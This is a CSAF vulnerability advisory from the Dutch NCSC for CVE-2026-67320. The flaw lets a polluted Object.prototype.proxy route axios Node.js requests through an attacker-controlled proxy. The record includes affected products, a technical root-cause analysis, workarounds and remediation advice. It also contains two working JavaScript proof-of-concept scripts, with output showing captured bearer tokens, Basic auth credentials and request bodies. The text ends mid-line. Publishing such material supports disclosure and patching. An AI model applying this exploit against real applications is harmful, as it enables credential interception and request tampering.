{
    "document": {
        "category": "csaf_base",
        "csaf_version": "2.0",
        "distribution": {
            "tlp": {
                "label": "WHITE"
            }
        },
        "lang": "en",
        "notes": [
            {
                "category": "legal_disclaimer",
                "text": "The Netherlands Cyber Security Center (henceforth: NCSC-NL) maintains this portal to enhance access to its information and vulnerabilities. The use of this information is subject to the following terms and conditions:\n\nThe vulnerabilities disclosed in this portal are gathered by NCSC-NL from a variety of open sources, which the user can retrieve from other platforms. NCSC-NL makes every reasonable effort to ensure that the content of this portal is kept up to date, and that it is accurate and complete. Nevertheless, NCSC-NL cannot entirely rule out the possibility of errors, and therefore cannot give any warranty in respect of its completeness, accuracy or real-time keeping up-to-date. NCSC-NL does not control nor guarantee the accuracy, relevance, timeliness or completeness of information obtained from these external sources. The vulnerabilities disclosed in this portal are intended solely for the convenience of professional parties to take appropriate measures to manage the risks posed to the cybersecurity. No rights can be derived from the information provided therein.\n\nNCSC-NL and the Kingdom of the Netherlands assume no legal liability or responsibility for any damage resulting from either the use or inability of use of the vulnerabilities disclosed in this portal. This includes damage resulting from the inaccuracy of incompleteness of the information contained in it.\nThe information on this page is subject to Dutch law. All disputes related to or arising from the use of this portal regarding the disclosure of vulnerabilities will be submitted to the competent court in The Hague. This choice of means also applies to the court in summary proceedings."
            }
        ],
        "publisher": {
            "category": "coordinator",
            "contact_details": "cert@ncsc.nl",
            "name": "National Cyber Security Centre",
            "namespace": "https://www.ncsc.nl/"
        },
        "title": "CVE-2026-67320",
        "tracking": {
            "current_release_date": "2026-08-21T12:07:46.650287Z",
            "generator": {
                "date": "2026-02-17T15:00:00Z",
                "engine": {
                    "name": "V.E.L.M.A",
                    "version": "1.7"
                }
            },
            "id": "CVE-2026-67320",
            "initial_release_date": "2026-08-01T13:27:07.939465Z",
            "revision_history": [
                {
                    "date": "2026-08-01T13:27:07.939465Z",
                    "number": "1",
                    "summary": "CVE created.| Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-08-01T13:27:11.929963Z",
                    "number": "2",
                    "summary": "NCSC Score created."
                },
                {
                    "date": "2026-08-01T13:39:11.437899Z",
                    "number": "3",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (3).| Products created (1).| References created (3).| CWES updated (1)."
                },
                {
                    "date": "2026-08-01T13:39:14.017191Z",
                    "number": "4",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-08-01T15:35:52.186209Z",
                    "number": "5",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-08-02T00:45:33.310283Z",
                    "number": "6",
                    "summary": "Source created.| CVE status created. (valid)| Products connected (2)."
                },
                {
                    "date": "2026-08-02T06:11:08.187148Z",
                    "number": "7",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (6).| References created (5).| CWES updated (1)."
                },
                {
                    "date": "2026-08-02T06:11:16.589587Z",
                    "number": "8",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-08-02T06:21:24.165954Z",
                    "number": "9",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (1).| Products created (1).| References created (7).| CWES updated (1)."
                },
                {
                    "date": "2026-08-02T06:21:25.621794Z",
                    "number": "10",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-08-02T06:44:09.842078Z",
                    "number": "11",
                    "summary": "Description created for source."
                },
                {
                    "date": "2026-08-02T12:44:57.301527Z",
                    "number": "12",
                    "summary": "Products connected (2).| Products removed (2)."
                },
                {
                    "date": "2026-08-02T15:22:37.047192Z",
                    "number": "13",
                    "summary": "Source connected.| CVE status created. (valid)| EPSS created."
                },
                {
                    "date": "2026-08-02T15:22:44.276124Z",
                    "number": "14",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-08-03T16:39:13.451885Z",
                    "number": "15",
                    "summary": "Unknown change."
                },
                {
                    "date": "2026-08-03T16:39:15.453544Z",
                    "number": "16",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-08-04T00:28:08.952867Z",
                    "number": "17",
                    "summary": "Source created.| CVE status created. (valid)| Description created for source.| CVSS created.| Products connected (4).| Product Identifiers created (1).| References created (5).| CWES updated (1).| Vendor_assessment created."
                },
                {
                    "date": "2026-08-04T00:28:11.673144Z",
                    "number": "18",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-08-19T12:07:03.205212Z",
                    "number": "19",
                    "summary": "Source connected.| CVE status created. (valid)| Products connected (11).| References created (3)."
                },
                {
                    "date": "2026-08-19T12:07:05.207451Z",
                    "number": "20",
                    "summary": "NCSC Score updated."
                },
                {
                    "date": "2026-08-21T12:06:00.484390Z",
                    "number": "21",
                    "summary": "Source connected.| CVE status created. (valid)| Products connected (1).| References created (3)."
                },
                {
                    "date": "2026-08-21T12:06:05.811350Z",
                    "number": "22",
                    "summary": "NCSC Score updated."
                }
            ],
            "status": "interim",
            "version": "22"
        }
    },
    "product_tree": {
        "branches": [
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:semver/0.31.1|<0.33.0",
                                "product": {
                                    "name": "vers:semver/0.31.1|<0.33.0",
                                    "product_id": "CSAFPID-8924481"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:semver/0.33.0",
                                "product": {
                                    "name": "vers:semver/0.33.0",
                                    "product_id": "CSAFPID-8924482"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:semver/1.15.2|<1.18.0",
                                "product": {
                                    "name": "vers:semver/1.15.2|<1.18.0",
                                    "product_id": "CSAFPID-8924484"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:semver/1.18.0",
                                "product": {
                                    "name": "vers:semver/1.18.0",
                                    "product_id": "CSAFPID-8924478"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=0.31.1|<0.33.0",
                                "product": {
                                    "name": "vers:unknown/>=0.31.1|<0.33.0",
                                    "product_id": "CSAFPID-8925846"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/>=1.15.2|<1.18.0",
                                "product": {
                                    "name": "vers:unknown/>=1.15.2|<1.18.0",
                                    "product_id": "CSAFPID-8925867"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.31.1",
                                "product": {
                                    "name": "vers:unknown/v0.31.1",
                                    "product_id": "CSAFPID-8600993"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v0.32.0",
                                "product": {
                                    "name": "vers:unknown/v0.32.0",
                                    "product_id": "CSAFPID-8925640"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.15.2",
                                "product": {
                                    "name": "vers:unknown/v1.15.2",
                                    "product_id": "CSAFPID-8583063"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.0",
                                "product": {
                                    "name": "vers:unknown/v1.16.0",
                                    "product_id": "CSAFPID-8925641"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.16.1",
                                "product": {
                                    "name": "vers:unknown/v1.16.1",
                                    "product_id": "CSAFPID-8925639"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/v1.17.0",
                                "product": {
                                    "name": "vers:unknown/v1.17.0",
                                    "product_id": "CSAFPID-8925638"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Axios"
                    }
                ],
                "category": "vendor",
                "name": "Axios"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/data center lts <10.2.22",
                                "product": {
                                    "name": "vers:unknown/data center lts <10.2.22",
                                    "product_id": "CSAFPID-9012403"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/data center lts <12.1.10",
                                "product": {
                                    "name": "vers:unknown/data center lts <12.1.10",
                                    "product_id": "CSAFPID-9012404"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Bamboo"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/data center <10.4.2",
                                "product": {
                                    "name": "vers:unknown/data center <10.4.2",
                                    "product_id": "CSAFPID-9012406"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/data center lts <10.2.6",
                                "product": {
                                    "name": "vers:unknown/data center lts <10.2.6",
                                    "product_id": "CSAFPID-9012408"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/data center lts <9.4.23",
                                "product": {
                                    "name": "vers:unknown/data center lts <9.4.23",
                                    "product_id": "CSAFPID-9012407"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Bitbucket"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/data center lts <10.2.15",
                                "product": {
                                    "name": "vers:unknown/data center lts <10.2.15",
                                    "product_id": "CSAFPID-9012410"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/data center lts <9.2.23",
                                "product": {
                                    "name": "vers:unknown/data center lts <9.2.23",
                                    "product_id": "CSAFPID-9012409"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Confluence"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<4.9.13",
                                "product": {
                                    "name": "vers:unknown/<4.9.13",
                                    "product_id": "CSAFPID-9012413"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Crucible"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<4.9.13",
                                "product": {
                                    "name": "vers:unknown/<4.9.13",
                                    "product_id": "CSAFPID-9012411"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Fisheye"
                    },
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/data center lts <10.3.24",
                                "product": {
                                    "name": "vers:unknown/data center lts <10.3.24",
                                    "product_id": "CSAFPID-9012405"
                                }
                            },
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/data center lts <11.3.10",
                                "product": {
                                    "name": "vers:unknown/data center lts <11.3.10",
                                    "product_id": "CSAFPID-9012414"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Jira"
                    }
                ],
                "category": "vendor",
                "name": "Atlassian"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:unknown/<9.2.44.2",
                                "product": {
                                    "name": "vers:unknown/<9.2.44.2",
                                    "product_id": "CSAFPID-9033546"
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "License Metric Tool"
                    }
                ],
                "category": "vendor",
                "name": "IBM"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "category": "product_version_range",
                                "name": "vers:rpm/1",
                                "product": {
                                    "name": "vers:rpm/1",
                                    "product_id": "CSAFPID-6014972",
                                    "product_identification_helper": {
                                        "cpe": "cpe:/a:redhat:hummingbird:1"
                                    }
                                }
                            }
                        ],
                        "category": "product_name",
                        "name": "Red Hat Hardened Images"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-8902830"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "grafana12.4"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-8902831"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "grafana13.1"
                            },
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:rpm/unknown",
                                        "product": {
                                            "name": "vers:rpm/unknown",
                                            "product_id": "CSAFPID-8476867"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "jaeger"
                            }
                        ],
                        "category": "product_family",
                        "name": "Red Hat Hardened Images"
                    }
                ],
                "category": "vendor",
                "name": "Red Hat"
            },
            {
                "branches": [
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/*",
                                        "product": {
                                            "name": "vers:deb/*",
                                            "product_id": "CSAFPID-1409455"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "node-axios"
                            }
                        ],
                        "category": "product_family",
                        "name": "bookworm"
                    },
                    {
                        "branches": [
                            {
                                "branches": [
                                    {
                                        "category": "product_version_range",
                                        "name": "vers:deb/*",
                                        "product": {
                                            "name": "vers:deb/*",
                                            "product_id": "CSAFPID-1409456"
                                        }
                                    }
                                ],
                                "category": "product_name",
                                "name": "node-axios"
                            }
                        ],
                        "category": "product_family",
                        "name": "bullseye"
                    }
                ],
                "category": "vendor",
                "name": "Debian"
            }
        ]
    },
    "vulnerabilities": [
        {
            "cve": "CVE-2026-67320",
            "cwe": {
                "id": "CWE-1321",
                "name": "Improperly Controlled Modification of Object Prototype Attributes ('Prototype Pollution')"
            },
            "notes": [
                {
                    "category": "description",
                    "text": "axios in a Node.js deployment using the HTTP adapter can route requests through an attacker-controlled proxy. axios hardens merged request configuration by creating a null-prototype object, but request interceptors run after the merge; a common immutable interceptor pattern such as {...config} or Object.assign({}, config) converts the hardened config back into a regular object. axios then dispatches that object without re-hardening it, and the Node HTTP adapter reads config.proxy through the prototype chain. If an attacker can pollute Object.prototype.proxy, affected requests can be routed through an attacker-controlled proxy. For plaintext HTTP requests, the proxy can observe Authorization headers, Basic auth from config.auth, method, absolute URL, Host, and request body, and can return its own response. This does not establish browser impact or HTTPS header/body disclosure under normal TLS validation. Affected versions are >=0.31.1 (fixed in 0.33.0) and >=1.15.2 (fixed in 1.18.0).",
                    "title": "nvd - https://services.nvd.nist.gov/rest/json/cves/2.0?cveId=CVE-2026-67320"
                },
                {
                    "category": "description",
                    "text": "axios in a Node.js deployment using the HTTP adapter can route requests through an attacker-controlled proxy. axios hardens merged request configuration by creating a null-prototype object, but request interceptors run after the merge; a common immutable interceptor pattern such as {...config} or Object.assign({}, config) converts the hardened config back into a regular object. axios then dispatches that object without re-hardening it, and the Node HTTP adapter reads config.proxy through the prototype chain. If an attacker can pollute Object.prototype.proxy, affected requests can be routed through an attacker-controlled proxy. For plaintext HTTP requests, the proxy can observe Authorization headers, Basic auth from config.auth, method, absolute URL, Host, and request body, and can return its own response. This does not establish browser impact or HTTPS header/body disclosure under normal TLS validation. Affected versions are >=0.31.1 (fixed in 0.33.0) and >=1.15.2 (fixed in 1.18.0).",
                    "title": "cveprojectv5 - https://raw.githubusercontent.com/CVEProject/cvelistV5/main/cves/2026/67xxx/CVE-2026-67320.json"
                },
                {
                    "category": "description",
                    "text": "axios in a Node.js deployment using the HTTP adapter can route requests through an attacker-controlled proxy. axios hardens merged request configuration by creating a null-prototype object, but request interceptors run after the merge; a common immutable interceptor pattern such as {...config} or Object.assign({}, config) converts the hardened config back into a regular object. axios then dispatches that object without re-hardening it, and the Node HTTP adapter reads config.proxy through the prototype chain. If an attacker can pollute Object.prototype.proxy, affected requests can be routed through an attacker-controlled proxy. For plaintext HTTP requests, the proxy can observe Authorization headers, Basic auth from config.auth, method, absolute URL, Host, and request body, and can return its own response. This does not establish browser impact or HTTPS header/body disclosure under normal TLS validation. Affected versions are >=0.31.1 (fixed in 0.33.0) and >=1.15.2 (fixed in 1.18.0).",
                    "title": "osv - https://www.googleapis.com/download/storage/v1/b/osv-vulnerabilities/o/GIT%2FCVE-2026-67320.json?alt=media"
                },
                {
                    "category": "description",
                    "text": "## Summary\n\nAxios’ Node.js HTTP adapter can route requests through an attacker-controlled proxy when `Object.prototype.proxy` is polluted and request configuration is materialized as a regular object before dispatch.\n\nRecent axios releases harden merged request config by creating a null-prototype object. However, request interceptors run after that merge and may return a replacement config. A common immutable interceptor pattern such as `{...config}` or `Object.assign({}, config)` converts the hardened config back into a normal object. Axios then dispatches that object without re-hardening it, and the Node HTTP adapter reads `config.proxy` through the prototype chain.\n\n## Impact\n\nIn a Node.js deployment using the HTTP adapter, an attacker who can trigger prototype pollution elsewhere in the process can route affected HTTP requests through an attacker-controlled proxy.\n\nThe highest confirmed impact is for plaintext HTTP requests. The proxy can observe explicit `Authorization` headers, axios-generated Basic auth from `config.auth`, request method, absolute URL, `Host`, and request body content. The proxy can also return its own response to axios for the affected request.\n\nThis does not establish browser impact. It also does not establish HTTPS header or body disclosure under normal TLS validation.\n\n## Affected Functionality\n\nAffected functionality is limited to axios requests that use the Node.js HTTP adapter, including default Node usage when the HTTP adapter is selected and explicit `adapter: 'http'` usage.\n\nThe relevant configuration path is `config.proxy` in the Node HTTP adapter. The hardened-bypass path requires a request interceptor such as:\n\n```js\napi.interceptors.request.use((config) => ({\n  ...config,\n  headers: {\n    ...config.headers,\n    'X-App': 'demo'\n  }\n}));\n```\n\nUnaffected or mitigating conditions include browser adapters, the Node fetch adapter, no polluted `Object.prototype.proxy`, an own `proxy: false` or safe own `proxy` value on the config, and hardened releases where interceptors return the original null-prototype config instead of a regular object clone.\n\n## Technical Details\n\n`lib/core/mergeConfig.js` creates a null-prototype merged config and uses own-property reads for merged values. This is intended to prevent polluted `Object.prototype` values from affecting config behavior.\n\n`lib/core/Axios.js` runs request interceptors after the merge. In both the asynchronous and synchronous interceptor paths, axios passes the interceptor-returned config into dispatch.\n\n`lib/core/dispatchRequest.js` accepts that returned config, transforms request data, selects the adapter, and calls the adapter without re-hardening or re-normalizing the config.\n\n`lib/adapters/http.js` uses own-property reads for several sensitive fields, but the initial proxy dispatch path still passes `config.proxy` directly into `setProxy()`. If an interceptor returned a regular object, `config.proxy` can resolve to inherited `Object.prototype.proxy`.\n\n## Proof of Concept of Attack\n\n```js\nimport axios from './index.js';\nimport http from 'node:http';\n\nfor (const key of [\n  'HTTP_PROXY', 'HTTPS_PROXY', 'ALL_PROXY',\n  'http_proxy', 'https_proxy', 'all_proxy',\n  'NO_PROXY', 'no_proxy'\n]) {\n  delete process.env[key];\n}\n\nconst listen = (handler) => new Promise((resolve, reject) => {\n  const server = http.createServer(handler);\n  server.once('error', reject);\n  server.listen(0, '127.0.0.1', () => resolve(server));\n});\n\nconst close = (server) => new Promise((resolve) => server.close(resolve));\n\nconst targetHits = [];\nconst proxyHits = [];\n\nconst target = await listen((req, res) => {\n  targetHits.push(req.url);\n  res.end('target');\n});\n\nconst proxy = await listen((req, res) => {\n  let body = '';\n  req.on('data', (chunk) => body += chunk);\n  req.on('end', () => {\n    proxyHits.push({\n      url: req.url,\n      authorization: req.headers.authorization,\n      host: req.headers.host,\n      body\n    });\n    res.setHeader('content-type', 'application/json');\n    res.end('{\"server\":\"proxy\"}');\n  });\n});\n\nObject.prototype.proxy = {\n  protocol: 'http',\n  host: '127.0.0.1',\n  port: proxy.address().port\n};\n\nconst api = axios.create();\n\napi.interceptors.request.use((config) => ({\n  ...config,\n  headers: {\n    ...config.headers,\n    'X-App': 'demo'\n  }\n}));\n\ntry {\n  const url = `http://127.0.0.1:${target.address().port}/api/secret`;\n\n  const res = await api.post(\n    url,\n    {secret: 'request-body-secret'},\n    {headers: {Authorization: 'Bearer EXPLICIT_SECRET'}}\n  );\n\n  console.log({\n    response: res.data,\n    targetHits,\n    proxyHits,\n    finalConfigHasOwnProxy: Object.hasOwn(res.config, 'proxy')\n  });\n} finally {\n  delete Object.prototype.proxy;\n  await close(target);\n  await close(proxy);\n}\n```\n\nExpected vulnerable result: the response comes from the proxy, `targetHits` is empty, and `proxyHits` contains the absolute URL, authorization header, host header, and request body.\n\n## Workarounds\n\nSet an own `proxy: false` on affected requests or on an axios instance when proxy support is not required.\n\nAvoid request interceptors that return regular object clones of config in hardened releases. Returning the original config or cloning into a null-prototype object avoids this specific bypass, but this is fragile and should not replace a fix.\n\nUse the Node fetch adapter for affected requests where its behavior is compatible with the application.\n\n<details>\n<summary>Original Report</summary>\n\n## Summary\n\n  Axios hardens merged request config by creating a null-prototype object, preventing polluted Object.prototype properties from influencing request behavior. Request interceptors run after that hardening, and a normal immutable\n  interceptor pattern such as {...config} or Object.assign({}, config) re-materializes the config as a regular object. Axios then dispatches that interceptor-returned object without re-hardening it. In the Node HTTP adapter, config.proxy\n  is read through the prototype chain, allowing a polluted Object.prototype.proxy to route authenticated HTTP requests through an attacker-controlled proxy.\n\n  ## Impact\n\n  In a Node.js deployment using the HTTP adapter, an attacker who can trigger prototype pollution elsewhere in the process can cause affected axios requests to be sent through an attacker-controlled proxy when the application uses a\n  request interceptor that returns a plain object copy of the config.\n\n  Verified local impact:\n\n  - Authenticated request redirection to attacker-controlled proxy.\n  - Disclosure of explicit Authorization headers.\n  - Disclosure of axios-generated Basic auth headers from config.auth.\n  - Disclosure of request metadata: method, absolute URL, Host header.\n  - Disclosure of POST body content.\n\n  This report does not claim browser impact or proven HTTPS credential disclosure. The demonstrated credential and body disclosure is for Node HTTP-adapter requests over HTTP/plaintext.\n\n  ## Affected component\n\n  The affected component is the Node.js HTTP adapter request path after request interceptors have run.\n\n  The issue requires:\n\n  - Node.js HTTP adapter usage.\n  - A polluted Object.prototype.proxy.\n  - A request interceptor that returns a plain object copy of the config.\n  - No own proxy: false or safe own proxy property on the request config.\n\n  ## Affected versions\n\n  Confirmed affected for this specific hardening-bypass variant:\n\n  - axios@1.15.2\n  - axios@1.16.0\n\n  axios@1.16.0 was the latest published version observed via npm view axios version during validation.\n\n  Related older behavior observed during testing:\n\n  - 1.13.0, 1.13.6, 1.14.0, 1.15.0, and 1.15.1 routed via inherited Object.prototype.proxy even without the interceptor re-materialization step. That is related background, not the narrowed hardening-bypass variant described here.\n\n  ## Root cause\n\n  1. Initial hardening\n\n     Axios initially hardens merged request config by creating a null-prototype object in mergeConfig(), which is meant to prevent inherited Object.prototype properties from influencing request behavior.\n     Permalink: https://github.com/axios/axios/blob/df53d7dd99b202fb194217abd127ae6a630e70dc/lib/core/mergeConfig.js#L21-L25\n  2. Interceptor re-materialization\n\n     Request interceptors run after that hardening step, and axios allows an interceptor to return a replacement config object. A common immutable pattern such as {...config} or Object.assign({}, config) converts the hardened null-\n     prototype config back into a normal object with Object.prototype as its prototype.\n     Permalinks: https://github.com/axios/axios/blob/df53d7dd99b202fb194217abd127ae6a630e70dc/lib/core/Axios.js#L187-L199, https://github.com/axios/axios/blob/df53d7dd99b202fb194217abd127ae6a630e70dc/lib/core/Axios.js#L204-L218\n  3. No post-interceptor re-hardening\n\n     Axios passes the interceptor-returned config into request dispatch without restoring the null-prototype property or otherwise normalizing the object into an own-property-only structure.\n     Permalink: https://github.com/axios/axios/blob/df53d7dd99b202fb194217abd127ae6a630e70dc/lib/core/dispatchRequest.js#L34-L48\n  4. Prototype-chain read of proxy in the Node adapter\n\n     The Node HTTP adapter later consults config.proxy, and this read is reachable through the prototype chain once the interceptor has re-materialized the config as a normal object. As a result, a polluted Object.prototype.proxy can\n     redirect the outgoing authenticated request through an attacker-controlled proxy.\n     Permalink: https://github.com/axios/axios/blob/df53d7dd99b202fb194217abd127ae6a630e70dc/lib/adapters/http.js#L816-L820\n\n  ## Why this is a security issue and not intended behavior\n\n  Axios’ threat model explicitly treats polluted Object.prototype config reads as high-impact read-side gadgets and states that axios defends reachable config-read gadgets through own-property checks and null-prototype structures. The\n  existing regression tests also assert that a polluted Object.prototype.proxy must not route requests through an attacker proxy.\n\n  This behavior is therefore a bypass of axios’ existing prototype-pollution hardening, not merely a generic “polluted process” complaint. The interceptor does not need to be malicious; it can be ordinary application code that returns an\n  immutable copy of the config. The attacker-controlled piece is the polluted prototype property supplied by a separate vulnerability or dependency.\n\n  ## Realistic threat model\n\n  A realistic exploit chain is:\n\n  1. A transitive dependency or upstream parser bug allows prototype pollution in a Node.js process.\n  2. The polluted property is Object.prototype.proxy, with host and port pointing to an attacker-controlled proxy.\n  3. The application uses axios with a request interceptor that returns a plain object copy, such as adding headers immutably.\n  4. The application sends an HTTP request with credentials or sensitive body data.\n  5. Axios routes that request through the inherited proxy configuration.\n\n  This requires a prototype pollution primitive and a compatible interceptor pattern. It does not require the attacker to control the interceptor.\n\n  ## Proof of concept\n\n  Save as poc.mjs in the axios repository root:\n\n```js\n  import axios from './index.js';\n  import http from 'node:http';\n\n  const proxyEnvKeys = [\n    'HTTP_PROXY', 'HTTPS_PROXY', 'ALL_PROXY',\n    'http_proxy', 'https_proxy', 'all_proxy',\n    'NO_PROXY', 'no_proxy'\n  ];\n\n  for (const key of proxyEnvKeys) delete process.env[key];\n\n  const listen = (handler) => new Promise((resolve, reject) => {\n    const server = http.createServer(handler);\n    server.once('error', reject);\n    server.listen(0, '127.0.0.1', () => resolve(server));\n  });\n\n  const close = (server) => new Promise((resolve) => server.close(resolve));\n\n  const targetHits = [];\n  const proxyHits = [];\n\n  const target = await listen((req, res) => {\n    let body = '';\n    req.on('data', (chunk) => body += chunk);\n    req.on('end', () => {\n      targetHits.push({\n        url: req.url,\n        method: req.method,\n        authorization: req.headers.authorization || null,\n        body\n      });\n      res.writeHead(200, {'Content-Type': 'application/json'});\n      res.end(JSON.stringify({server: 'target'}));\n    });\n  });\n\n  const proxy = await listen((req, res) => {\n    let body = '';\n    req.on('data', (chunk) => body += chunk);\n    req.on('end', () => {\n      proxyHits.push({\n        url: req.url,\n        method: req.method,\n        authorization: req.headers.authorization || null,\n        host: req.headers.host || null,\n        body\n      });\n      res.writeHead(200, {'Content-Type': 'application/json'});\n      res.end(JSON.stringify({server: 'proxy'}));\n    });\n  });\n\n  Object.prototype.proxy = {\n    protocol: 'http',\n    host: '127.0.0.1',\n    port: proxy.address().port\n  };\n\n  const api = axios.create();\n\n  api.interceptors.request.use((config) => ({\n    ...config,\n    headers: {\n      ...config.headers,\n      'X-App': 'demo'\n    }\n  }));\n\n  try {\n    const url = `http://127.0.0.1:${target.address().port}/api/secret`;\n\n    const explicit = await api.get(url, {\n      headers: {Authorization: 'Bearer EXPLICIT_SECRET'}\n    });\n\n    proxyHits.length = 0;\n    targetHits.length = 0;\n\n    const basic = await api.get(url, {\n      auth: {username: 'svc-account', password: 'prod-secret'}\n    });\n\n    proxyHits.length = 0;\n    targetHits.length = 0;\n\n    const post = await api.post(url, {secret: 'request-body-secret'}, {\n      headers: {Authorization: 'Bearer EXPLICIT_SECRET'}\n    });\n\n    console.log(JSON.stringify({\n      explicitResponse: explicit.data,\n      basicResponse: basic.data,\n      postResponse: post.data,\n      targetHits,\n      proxyHits,\n      finalConfigPrototype:\n        Object.getPrototypeOf(post.config) === Object.prototype\n          ? 'Object.prototype'\n          : 'other',\n      finalConfigHasOwnProxy:\n        Object.prototype.hasOwnProperty.call(post.config, 'proxy')\n    }, null, 2));\n  } finally {\n    delete Object.prototype.proxy;\n    await close(target);\n    await close(proxy);\n  }\n```\n\n  Run:\n```bash\n  npm ci\n  node poc.mjs\n```\n\n  ## Observed results\n\n  Representative observed output from local loopback testing:\n\n```text\n\n  {\n    \"explicitResponse\": {\"server\": \"proxy\"},\n    \"basicResponse\": {\"server\": \"proxy\"},\n    \"postResponse\": {\"server\": \"proxy\"},\n    \"targetHits\": [],\n    \"proxyHits\": [\n      {\n        \"url\": \"http://127.0.0.1:40613/api/secret\",\n        \"method\": \"POST\",\n        \"authorization\": \"Bearer EXPLICIT_SECRET\",\n        \"host\": \"127.0.0.1:40613\",\n        \"body\": \"{\\\"secret\\\":\\\"request-body-secret\\\"}\"\n      }\n    ],\n    \"finalConfigPrototype\": \"Object.prototype\",\n    \"finalConfigHasOwnProxy\": false\n  }\n\n  Additional validation showed axios-generated Basic auth is also disclosed to the proxy:\n\n  {\n    \"authorization\": \"Basic c3ZjLWFjY291bnQ6cHJvZC1zZWNyZXQ=\"\n  }\n\n```\n\n  That value decodes to:\n\n  svc-account:prod-secret\n\n  Negative controls were also tested:\n\n  - No interceptor: target receives request, proxy receives none.\n  - Interceptor mutating and returning the same config object: proxy receives none.\n  - Own proxy: false: proxy receives none.\n  - Null-prototype clone interceptor: proxy receives none.\n  - Fetch adapter in Node with the same interceptor: proxy receives none.\n\n  ## Suggested remediation\n\n  Re-harden the final request config after all request interceptors and before adapter dispatch. This should cover both asynchronous and synchronous interceptor paths.\n\n  A practical fix would be to normalize the interceptor-returned object into a null-prototype, own-property-only config before calling dispatchRequest(), or at the start of dispatchRequest() itself. Security-sensitive adapter reads should\n  also consistently use own-property access helpers. In particular, the Node HTTP adapter should not read config.proxy through the prototype chain.\n\n  ## Minimal regression test\n\n  Add an end-to-end Node HTTP adapter test that:\n\n  1. Starts a target server and attacker proxy on 127.0.0.1.\n  2. Sets Object.prototype.proxy to the attacker proxy.\n  3. Adds a request interceptor returning {...config, headers: {...config.headers}}.\n  4. Sends a request with an Authorization header.\n  5. Asserts the target server receives the request.\n  6. Asserts the attacker proxy receives no request.\n  7. Asserts the final config no longer exposes inherited proxy.\n\n  A second assertion can cover config.auth to ensure axios-generated Basic auth is not sent to the attacker proxy.\n\n  ## References / permalinks\n\n  - mergeConfig() null-prototype hardening: https://github.com/axios/axios/blob/df53d7dd99b202fb194217abd127ae6a630e70dc/lib/core/mergeConfig.js#L21-L25\n  - Async interceptor dispatch path: https://github.com/axios/axios/blob/df53d7dd99b202fb194217abd127ae6a630e70dc/lib/core/Axios.js#L187-L199\n  - Synchronous interceptor dispatch path: https://github.com/axios/axios/blob/df53d7dd99b202fb194217abd127ae6a630e70dc/lib/core/Axios.js#L204-L218\n  - dispatchRequest() receives interceptor-returned config: https://github.com/axios/axios/blob/df53d7dd99b202fb194217abd127ae6a630e70dc/lib/core/dispatchRequest.js#L34-L48\n  - Node HTTP adapter config.proxy read: 